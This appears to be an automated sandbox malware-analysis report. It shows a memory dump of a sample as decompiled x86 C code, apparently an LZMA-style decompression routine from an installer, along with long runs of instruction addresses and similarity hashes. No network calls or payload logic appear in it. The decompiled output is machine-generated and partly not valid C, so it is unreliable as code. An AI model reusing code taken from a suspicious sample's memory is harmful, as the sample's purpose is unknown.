												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L127:
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											L167:
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t539 = _t538 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}















              0x00407090
              0x00407090
              0x00407090
              0x00407090
              0x00407096
              0x0040709a
              0x0040709e
              0x004070a8
              0x004070b6
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x004073c3
              0x004073c3
              0x004073c7
              0x00000000
              0x00000000
              0x004073c9
              0x004073d2
              0x004073d8
              0x004073db
              0x004073de
              0x004073e1
              0x004073e4
              0x004073ea
              0x00407403
              0x00407406
              0x00407412
              0x00407413
              0x00407416
              0x004073ec
              0x004073ec
              0x004073fb
              0x004073fe
              0x004073fe
              0x00407420
              0x004073c0
              0x004073c0
              0x004073c0
              0x004073c3
              0x004073c7
              0x00000000
              0x00000000
              0x00000000
              0x00407422
              0x00407422
              0x0040739b
              0x0040739f
              0x004074d7
              0x004074d7
              0x004074e1
              0x004074e9
              0x004074f0
              0x004074f2
              0x004074f9
              0x004074fd
              0x004074fd
              0x004073a5
              0x004073ab
              0x004073b2
              0x004073ba
              0x004073ba
              0x004073bd
              0x00000000
              0x004073bd
              0x00407427
              0x00407434
              0x00407437
              0x00407343
              0x00407343
              0x00407343
              0x00406adf
              0x00406adf
              0x00406adf
              0x00406ae8
              0x00000000
              0x00000000
              0x00406aee
              0x00406aee
              0x00000000
              0x00406af5
              0x00406af9
              0x00000000
              0x00000000
              0x00406aff
              0x00406b02
              0x00406b05
              0x00406b08
              0x00406b0c
              0x00000000
              0x00000000
              0x00406b12
              0x00406b12
              0x00406b15
              0x00406b17
              0x00406b18
              0x00406b1b
              0x00406b1d
              0x00406b1e
              0x00406b20
              0x00406b23
              0x00406b28
              0x00406b2d
              0x00406b36
              0x00406b49
              0x00406b4c
              0x00406b58
              0x00406b80
              0x00406b82
              0x00406b90
              0x00406b90
              0x00406b94
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406b84
              0x00406b84
              0x00406b87
              0x00406b88
              0x00406b88
              0x00000000
              0x00406b84
              0x00406b5a
              0x00406b5e
              0x00406b63
              0x00406b63
              0x00406b6c
              0x00406b74
              0x00406b77
              0x00000000
              0x00406b7d
              0x00406b7d
              0x00000000
              0x00406b7d
              0x00000000
              0x00406b9a
              0x00406b9a
              0x00406b9e
              0x0040744a
              0x0040744a
              0x00000000
              0x0040744a
              0x00406ba4
              0x00406ba7
              0x00406bb7
              0x00406bba
              0x00406bbd
              0x00406bbd
              0x00406bbd
              0x00406bc0
              0x00406bc4
              0x00000000
              0x00000000
              0x00406bc6
              0x00406bc6
              0x00406bcc
              0x00406bf6
              0x00406bfc
              0x00406c03
              0x00000000
              0x00406c03
              0x00406bce
              0x00406bd2
              0x00406bd5
              0x00406bda
              0x00406bda
              0x00406be5
              0x00406bed
              0x00406bf0
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00406c35
              0x00406c3b
              0x00406c3e
              0x00406c4b
              0x00406c53
              0x00000000
              0x00000000
              0x00406c0a
              0x00406c0a
              0x00406c0e
              0x00407459
              0x00407459
              0x00000000
              0x00407459
              0x00406c14
              0x00406c1a
              0x00406c25
              0x00406c25
              0x00406c25
              0x00406c28
              0x00406c2b
              0x00406c2e
              0x00406c33
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x004072ca
              0x004072ca
              0x004072d0
              0x004072d6
              0x004072dc
              0x004072f6
              0x004072f9
              0x004072ff
              0x0040730a
              0x0040730a
              0x0040730c
              0x004072de
              0x004072de
              0x004072ed
              0x004072f1
              0x004072f1
              0x00407316
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00407318
              0x0040731c
              0x004074cb
              0x004074cb
              0x00000000
              0x004074cb
              0x00407322
              0x00407328
              0x0040732f
              0x00407337
              0x0040733a
              0x0040733d
              0x0040733d
              0x00407343
              0x00407343
              0x00000000
              0x00000000
              0x00406c5b
              0x00406c5b
              0x00406c5d
              0x00406c60
              0x00406cd1
              0x00406cd1
              0x00406cd4
              0x00406cd7
              0x00406cde
              0x00406ce8
              0x00000000
              0x00406ce8
              0x00406c62
              0x00406c62
              0x00406c66
              0x00406c69
              0x00406c6b
              0x00406c6e
              0x00406c71
              0x00406c73
              0x00406c76
              0x00406c78
              0x00406c7d
              0x00406c80
              0x00406c83
              0x00406c87
              0x00406c8e
              0x00406c91
              0x00406c98
              0x00406c9c
              0x00406ca4
              0x00406ca4
              0x00406ca4
              0x00406c9e
              0x00406c9e
              0x00406c9e
              0x00406c93
              0x00406c93
              0x00406c93
              0x00406ca8
              0x00406cab
              0x00406cc9
              0x00406cc9
              0x00406ccb
              0x00000000
              0x00406cad
              0x00406cad
              0x00406cad
              0x00406cb0
              0x00406cb3
              0x00406cb6
              0x00406cb8
              0x00406cb8
              0x00406cb8
              0x00406cbb
              0x00406cbe
              0x00406cc0
              0x00406cc1
              0x00406cc4
              0x00000000
              0x00406cc4
              0x00000000
              0x00406efa
              0x00406efa
              0x00406efe
              0x00406f1c
              0x00406f1c
              0x00406f1f
              0x00406f26
              0x00406f29
              0x00406f2c
              0x00406f2f
              0x00406f32
              0x00406f35
              0x00406f37
              0x00406f3e
              0x00406f3f
              0x00406f41
              0x00406f44
              0x00406f47
              0x00406f4a
              0x00406f4a
              0x00406f4f
              0x00000000
              0x00406f4f
              0x00406f00
              0x00406f00
              0x00406f03
              0x00406f06
              0x00406f10
              0x00000000
              0x00000000
              0x00406f64
              0x00406f64
              0x00406f68
              0x00406f8b
              0x00406f8e
              0x00406f91
              0x00406f9b
              0x00406f6a
              0x00406f6a
              0x00406f6d
              0x00406f70
              0x00406f73
              0x00406f80
              0x00406f83
              0x00406f83
              0x00000000
              0x00000000
              0x00406fa7
              0x00406fa7
              0x00406fab
              0x00000000
              0x00000000
              0x00406fb1
              0x00406fb1
              0x00406fb5
              0x00000000
              0x00000000
              0x00406fbb
              0x00406fbb
              0x00406fbd
              0x00406fc1
              0x00406fc1
              0x00406fc4
              0x00406fc8
              0x00000000
              0x00000000
              0x00407018
              0x00407018
              0x0040701c
              0x00407023
              0x00407023
              0x00407026
              0x00407029
              0x00407033
              0x00000000
              0x00407033
              0x0040701e
              0x0040701e
              0x00000000
              0x00000000
              0x0040703f
              0x0040703f
              0x00407043
              0x0040704a
              0x0040704d
              0x00407050
              0x00407045
              0x00407045
              0x00407045
              0x00407053
              0x00407056
              0x00407059
              0x00407059
              0x0040705c
              0x0040705f
              0x00407062
              0x00407062
              0x00407065
              0x0040706c
              0x00407071
              0x00000000
              0x00000000
              0x004070ff
              0x004070ff
              0x00407103
              0x004074a1
              0x004074a1
              0x00000000
              0x004074a1
              0x00407109
              0x00407109
              0x0040710c
              0x0040710f
              0x00407113
              0x00407116
              0x0040711c
              0x0040711e
              0x0040711e
              0x0040711e
              0x00407121
              0x00407124
              0x00000000
              0x00000000
              0x00406cf4
              0x00406cf4
              0x00406cf8
              0x00407465
              0x00407465
              0x00000000
              0x00407465
              0x00406cfe
              0x00406cfe
              0x00406d01
              0x00406d04
              0x00406d08
              0x00406d0b
              0x00406d11
              0x00406d13
              0x00406d13
              0x00406d13
              0x00406d16
              0x00406d19
              0x00406d19
              0x00406d1c
              0x00406d1f
              0x00000000
              0x00000000
              0x00406d25
              0x00406d25
              0x00406d2b
              0x00000000
              0x00000000
              0x00406d31
              0x00406d31
              0x00406d35
              0x00406d38
              0x00406d3b
              0x00406d3e
              0x00406d41
              0x00406d42
              0x00406d45
              0x00406d47
              0x00406d4d
              0x00406d50
              0x00406d53
              0x00406d56
              0x00406d59
              0x00406d5c
              0x00406d5f
              0x00406d7b
              0x00406d7e
              0x00406d81
              0x00406d84
              0x00406d8b
              0x00406d8f
              0x00406d91
              0x00406d95
              0x00406d61
              0x00406d61
              0x00406d65
              0x00406d6d
              0x00406d72
              0x00406d74
              0x00406d76
              0x00406d76
              0x00406d98
              0x00406d9f
              0x00406da2
              0x00000000
              0x00406da8
              0x00406da8
              0x00000000
              0x00406da8
              0x00000000
              0x00406dad
              0x00406dad
              0x00406db1
              0x00407471
              0x00407471
              0x00000000
              0x00407471
              0x00406db7
              0x00406db7
              0x00406dba
              0x00406dbd
              0x00406dc1
              0x00406dc4
              0x00406dca
              0x00406dcc
              0x00406dcc
              0x00406dcc
              0x00406dcf
              0x00406dd2
              0x00406dd2
              0x00406dd2
              0x00406dd8
              0x00000000
              0x00000000
              0x00406dda
              0x00406dda
              0x00406ddd
              0x00406de0
              0x00406de3
              0x00406de6
              0x00406de9
              0x00406dec
              0x00406def
              0x00406df2
              0x00406df5
              0x00406df8
              0x00406e10
              0x00406e13
              0x00406e16
              0x00406e19
              0x00406e19
              0x00406e1c
              0x00406e20
              0x00406e22
              0x00406dfa
              0x00406dfa
              0x00406e02
              0x00406e07
              0x00406e09
              0x00406e0b
              0x00406e0b
              0x00406e25
              0x00406e2c
              0x00406e2f
              0x00000000
              0x00406e31
              0x00406e31
              0x00000000
              0x00406e31
              0x00406e2f
              0x00406e36
              0x00406e36
              0x00406e36
              0x00406e36
              0x00000000
              0x00000000
              0x00406e71
              0x00406e71
              0x00406e75
              0x0040747d
              0x0040747d
              0x00000000
              0x0040747d
              0x00406e7b
              0x00406e7b
              0x00406e7e
              0x00406e81
              0x00406e85
              0x00406e88
              0x00406e8e
              0x00406e90
              0x00406e90
              0x00406e90
              0x00406e93
              0x00406e96
              0x00406e96
              0x00406e9c
              0x00406e3a
              0x00406e3a
              0x00406e3d
              0x00000000
              0x00406e3d
              0x00406e9e
              0x00406e9e
              0x00406ea1
              0x00406ea4
              0x00406ea7
              0x00406eaa
              0x00406ead
              0x00406eb0
              0x00406eb3
              0x00406eb6
              0x00406eb9
              0x00406ebc
              0x00406ed4
              0x00406ed7
              0x00406eda
              0x00406edd
              0x00406edd
              0x00406ee0
              0x00406ee4
              0x00406ee6
              0x00406ebe
              0x00406ebe
              0x00406ec6
              0x00406ecb
              0x00406ecd
              0x00406ecf
              0x00406ecf
              0x00406ee9
              0x00406ef0
              0x00406ef3
              0x00000000
              0x00406ef5
              0x00406ef5
              0x00000000
              0x00406ef5
              0x00000000
              0x00407182
              0x00407182
              0x00407186
              0x004074ad
              0x004074ad
              0x00000000
              0x004074ad
              0x0040718c
              0x0040718c
              0x0040718f
              0x00407192
              0x00407196
              0x00407199
              0x0040719f
              0x004071a1
              0x004071a1
              0x004071a1
              0x004071a4
              0x00000000
              0x00000000
              0x00406f52
              0x00406f52
              0x00406f55
              0x00000000
              0x00000000
              0x00407291
              0x00407291
              0x00407295
              0x004072b7
              0x004072b7
              0x004072ba
              0x004072c4
              0x004072c7
              0x004072c7
              0x00000000
              0x004072c7
              0x00407297
              0x00407297
              0x0040729a
              0x0040729e
              0x004072a1
              0x004072a1
              0x004072a4
              0x00000000
              0x00000000
              0x0040734e
              0x0040734e
              0x00407352
              0x00407370
              0x00407370
              0x00407370
              0x00407370
              0x00407377
              0x0040737e
              0x00407385
              0x00407385
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00407399
              0x00407354
              0x00407354
              0x00407357
              0x0040735a
              0x0040735d
              0x00407364
              0x004072a8
              0x004072a8
              0x004072ab
              0x00000000
              0x00000000
              0x0040743f
              0x0040743f
              0x00407442
              0x00407343
              0x00407343
              0x00407343
              0x00000000
              0x00407349
              0x00000000
              0x00407079
              0x00407079
              0x0040707b
              0x00407082
              0x00407083
              0x00407085
              0x00407088
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040738c
              0x0040738c
              0x0040738f
              0x00407396
              0x00000000
              0x00407399
              0x00000000
              0x00000000
              0x00000000
              0x004070be
              0x004070be
              0x004070c1
              0x004070f7
              0x004070f7
              0x00407227
              0x00407227
              0x00407227
              0x00407227
              0x0040722a
              0x0040722a
              0x0040722d
              0x0040722f
              0x004074b9
              0x004074b9
              0x00000000
              0x004074b9
              0x00407235
              0x00407235
              0x00407238
              0x00000000
              0x00000000
              0x0040723e
              0x0040723e
              0x00407242
              0x00407245
              0x00407245
              0x00407245
              0x00000000
              0x00407245
              0x004070c3
              0x004070c3
              0x004070c5
              0x004070c7
              0x004070c9
              0x004070cc
              0x004070cd
              0x004070cf
              0x004070d1
              0x004070d4
              0x004070d7
              0x004070ed
              0x004070ed
              0x004070f2
              0x0040712a
              0x0040712a
              0x0040712e
              0x00407157
              0x0040715a
              0x0040715c
              0x00407163
              0x00407166
              0x00407169
              0x00407169
              0x0040716e
              0x0040716e
              0x00407170
              0x00407173
              0x0040717a
              0x0040717d
              0x004071aa
              0x004071aa
              0x004071ad
              0x004071b0
              0x00407224
              0x00407224
              0x00407224
              0x00407224
              0x00000000
              0x00407224
              0x004071b2
              0x004071b2
              0x004071b8
              0x004071bb
              0x004071be
              0x004071c1
              0x004071c4
              0x004071c7
              0x004071ca
              0x004071cd
              0x004071d0
              0x004071d3
              0x004071ec
              0x004071ee
              0x004071f1
              0x004071f2
              0x004071f5
              0x004071f7
              0x004071fa
              0x004071fc
              0x004071fe
              0x00407201
              0x00407203
              0x00407206
              0x0040720a
              0x0040720c
              0x0040720c
              0x0040720d
              0x00407210
              0x00407213
              0x004071d5
              0x004071d5
              0x004071dd
              0x004071e2
              0x004071e4
              0x004071e7
              0x004071e7
              0x00407216
              0x0040721d
              0x004071a7
              0x004071a7
              0x004071a7
              0x004071a7
              0x00000000
              0x0040721f
              0x0040721f
              0x00000000
              0x0040721f
              0x0040721d
              0x00407130
              0x00407130
              0x00407133
              0x00407135
              0x00407138
              0x0040713b
              0x0040713e
              0x00407140
              0x00407143
              0x00407146
              0x00407146
              0x00407149
              0x00407149
              0x0040714c
              0x00407153
              0x00407127
              0x00407127
              0x00407127
              0x00407127
              0x00000000
              0x00407155
              0x00407155
              0x00000000
              0x00407155
              0x00407153
              0x004070d9
              0x004070d9
              0x004070dc
              0x004070de
              0x004070e1
              0x00000000
              0x00000000
              0x00406e40
              0x00406e40
              0x00406e44
              0x00407489
              0x00407489
              0x00000000
              0x00407489
              0x00406e4a
              0x00406e4a
              0x00406e4d
              0x00406e50
              0x00406e53
              0x00406e56
              0x00406e59
              0x00406e5c
              0x00406e5e
              0x00406e61
              0x00406e64
              0x00406e67
              0x00406e69
              0x00406e69
              0x00406e69
              0x00000000
              0x00000000
              0x00406fcb
              0x00406fcb
              0x00406fcf
              0x00407495
              0x00407495
              0x00000000
              0x00407495
              0x00406fd5
              0x00406fd5
              0x00406fd8
              0x00406fdb
              0x00406fde
              0x00406fe0
              0x00406fe0
              0x00406fe0
              0x00406fe3
              0x00406fe6
              0x00406fe9
              0x00406fec
              0x00406fef
              0x00406ff2
              0x00406ff3
              0x00406ff5
              0x00406ff5
              0x00406ff5
              0x00406ff8
              0x00406ffb
              0x00406ffe
              0x00407001
              0x00407001
              0x00407001
              0x00407004
              0x00407006
              0x00407006
              0x00000000
              0x00000000
              0x00407248
              0x00407248
              0x00407248
              0x0040724c
              0x00000000
              0x00000000
              0x00407252
              0x00407252
              0x00407255
              0x00407258
              0x0040725b
              0x0040725d
              0x0040725d
              0x0040725d
              0x00407260
              0x00407263
              0x00407266
              0x00407269
              0x0040726c
              0x0040726f
              0x00407270
              0x00407272
              0x00407272
              0x00407272
              0x00407275
              0x00407278
              0x0040727b
              0x0040727e
              0x00407281
              0x00407285
              0x00407287
              0x0040728a
              0x00000000
              0x0040728c
              0x0040728c
              0x00407009
              0x00407009
              0x00000000
              0x00407009
              0x0040728a
              0x004074bf
              0x004074bf
              0x00000000
              0x00000000
              0x00406aee
              0x004074f6
              0x004074f6
              0x00000000
              0x004074f6
              0x00407343
              0x004073c3
              0x0040738c

              Memory Dump Source
              • Source File: 00000008.00000002.705726150.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000008.00000002.705721053.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705736390.0000000000408000.00000002.00020000.sdmp Download File
              • Associated: 00000008.00000002.705749744.000000000040A000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705758823.000000000040C000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705773375.0000000000414000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705786752.0000000000427000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705793842.0000000000435000.00000004.00020000.sdmp Download File
              • Associated: 00000008.00000002.705805319.000000000043B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
              • Instruction ID: a7b8be33b9a7519416cae36d16977938a601532f9034d24a777c3823dc36e66c
              • Opcode Fuzzy Hash: 32b4e55e20c06e4ab42ecec14c412173dc536429d2dc8db053d5bec18c4e9e97
              • Instruction Fuzzy Hash: F7A14571D04229CBDB28CFA8C854BADBBB1FF44305F14806ED856BB281D7786A86DF45
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00407291, Relevance: 5.2, APIs: 4, Instructions: 208COMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E00407291() {
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int* _t605;
				void* _t612;

				L0:
				while(1) {
					L0:
					if( *(_t612 - 0x40) != 0) {
						 *(_t612 - 0x84) = 0x13;
						_t605 =  *((intOrPtr*)(_t612 - 0x58)) + 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x4c);
						 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
						__ecx =  *(__ebp - 0x58);
						__eax =  *(__ebp - 0x4c) << 4;
						__eax =  *(__ebp - 0x58) + __eax + 4;
						L130:
						 *(__ebp - 0x58) = __eax;
						 *(__ebp - 0x40) = 3;
						L144:
						 *(__ebp - 0x7c) = 0x14;
						L145:
						__eax =  *(__ebp - 0x40);
						 *(__ebp - 0x50) = 1;
						 *(__ebp - 0x48) =  *(__ebp - 0x40);
						L149:
						if( *(__ebp - 0x48) <= 0) {
							__ecx =  *(__ebp - 0x40);
							__ebx =  *(__ebp - 0x50);
							0 = 1;
							__eax = 1 << __cl;
							__ebx =  *(__ebp - 0x50) - (1 << __cl);
							__eax =  *(__ebp - 0x7c);
							 *(__ebp - 0x44) = __ebx;
							while(1) {
								L140:
								 *(_t612 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t612 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M004074FE))) {
										case 0:
											if( *(_t612 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t534 =  *( *(_t612 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t569);
											_push(9);
											_pop(_t570);
											_t608 = _t538 / _t569;
											_t540 = _t538 % _t569 & 0x000000ff;
											asm("cdq");
											_t603 = _t540 % _t570 & 0x000000ff;
											 *(_t612 - 0x3c) = _t603;
											 *(_t612 - 0x1c) = (1 << _t608) - 1;
											 *((intOrPtr*)(_t612 - 0x18)) = (1 << _t540 / _t570) - 1;
											_t611 = (0x300 << _t603 + _t608) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t612 - 0x78))) {
												L10:
												if(_t611 == 0) {
													L12:
													 *(_t612 - 0x48) =  *(_t612 - 0x48) & 0x00000000;
													 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t611 = _t611 - 1;
													 *((short*)( *(_t612 - 4) + _t611 * 2)) = 0x400;
												} while (_t611 != 0);
												goto L12;
											}
											if( *(_t612 - 4) != 0) {
												GlobalFree( *(_t612 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t612 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t612 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 1;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x40) =  *(_t612 - 0x40) | ( *( *(_t612 - 0x70)) & 0x000000ff) <<  *(_t612 - 0x48) << 0x00000003;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											_t45 = _t612 - 0x48;
											 *_t45 =  *(_t612 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t612 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t612 - 0x40);
											if(_t546 ==  *(_t612 - 0x74)) {
												L20:
												 *(_t612 - 0x48) = 5;
												 *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) =  *( *(_t612 - 8) +  *(_t612 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t612 - 0x74) = _t546;
											if( *(_t612 - 8) != 0) {
												GlobalFree( *(_t612 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t612 - 0x40)); // executed
											 *(_t612 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t612 - 0x60) &  *(_t612 - 0x1c);
											 *(_t612 - 0x84) = 6;
											 *(_t612 - 0x4c) = _t553;
											_t605 =  *(_t612 - 4) + (( *(_t612 - 0x38) << 4) + _t553) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t612 - 0x6c);
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 3;
												goto L170;
											}
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											_t67 = _t612 - 0x70;
											 *_t67 =  &(( *(_t612 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L23:
											 *(_t612 - 0x48) =  *(_t612 - 0x48) - 1;
											if( *(_t612 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t605;
											_t588 = _t531 & 0x0000ffff;
											_t564 = ( *(_t612 - 0x10) >> 0xb) * _t588;
											if( *(_t612 - 0xc) >= _t564) {
												 *(_t612 - 0x10) =  *(_t612 - 0x10) - _t564;
												 *(_t612 - 0xc) =  *(_t612 - 0xc) - _t564;
												 *(_t612 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												__eflags = _t532;
												 *_t605 = _t532;
											} else {
												 *(_t612 - 0x10) = _t564;
												 *(_t612 - 0x40) =  *(_t612 - 0x40) & 0x00000000;
												 *_t605 = (0x800 - _t588 >> 5) + _t531;
											}
											if( *(_t612 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t612 - 0x6c) == 0) {
												 *(_t612 - 0x88) = 5;
												goto L170;
											}
											 *(_t612 - 0x10) =  *(_t612 - 0x10) << 8;
											 *(_t612 - 0x6c) =  *(_t612 - 0x6c) - 1;
											 *(_t612 - 0x70) =  &(( *(_t612 - 0x70))[1]);
											 *(_t612 - 0xc) =  *(_t612 - 0xc) << 0x00000008 |  *( *(_t612 - 0x70)) & 0x000000ff;
											L139:
											_t533 =  *(_t612 - 0x84);
											goto L140;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
